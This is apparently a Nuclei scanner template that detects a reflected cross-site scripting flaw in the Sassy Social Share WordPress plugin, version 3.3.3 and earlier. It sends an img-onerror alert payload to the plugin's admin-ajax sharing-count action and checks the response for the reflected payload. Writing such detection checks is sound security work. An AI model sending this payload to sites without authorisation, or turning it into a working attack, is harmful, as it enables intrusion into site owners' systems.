id: sassy-social-share-xss

info:
  name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
  author: Random_Robbie
  severity: medium
  tags: wordpress,wp-plugin,sassy,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '[{"<img src=x onerror=alert(document.domain)>":""}]'
          - 'facebook'
          - 'twitter'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
        negative: true

      - type: status
        status:
          - 200